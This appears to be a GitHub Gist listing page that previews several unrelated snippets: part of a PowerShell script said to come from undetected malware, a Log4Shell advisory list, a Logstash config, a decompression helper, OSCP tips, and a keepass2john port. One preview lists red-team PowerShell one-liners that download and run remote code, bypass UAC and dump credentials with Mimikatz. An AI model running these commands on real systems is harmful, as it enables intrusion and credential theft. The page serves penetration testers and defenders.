Kevin kevXZY

Working from home
  • Paris
infernoboy / danger.ps1
Created April 8, 2022 23:39
This script was found in a malicious file not being detected by any AV as reported by VirusTotal
$scriptItem = Get-Item -Path $MyInvocation.MyCommand.Path;
$OS_Major = [System.Environment]::OSVersion.Version.Major.ToString() + "." + [System.Environment]::OSVersion.Version.Minor.ToString();
$EndPointURL = "";
$__Version__ = "M_37";
[string]$WorkerEnHandle = [Guid]::NewGuid().ToString();
[System.Threading.EventWaitHandle]$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset, $WorkerEnHandle);
function XF3a8JO3r5r8G([string] $str) {
return [System.Environment]::ExpandEnvironmentVariables("%" + $str + "%")
SwitHak /
Last active September 9, 2024 14:28
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
Internet health:
General technology and security trends:
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
linuxmalaysia / logstash-windows-events.txt
Last active March 15, 2024 13:51
logstash windows events from winlogbeat. Translate common Event ID's and Translate common Event ID's to Quadrants
input {
beats {
id => "01-beats-input"
port => 55044
tags => "winlogbeat"
vortexau / decompress.ps1
Last active May 13, 2024 07:53
PowerShell to decompress DEFLATE data
$base64data = "insert compressed and base64 data here"
$data = [System.Convert]::FromBase64String($base64data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
while ($line = $sr.ReadLine()) {
mubix /
Last active August 30, 2024 19:42
How to start in Infosec

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it


Unicornscans in cli, nmap in msfconsole to help store loot in database.

HarmJ0y /
Created June 30, 2016 06:02
Python port of John the Ripper's keepass2john - extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases
# Python port of keepass2john from the John the Ripper suite (
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at> in March of 2012
# ./keepass2john.c was released under the GNU General Public License
# source keepass2john.c source code from:
# Python port by @harmj0y, GNU General Public License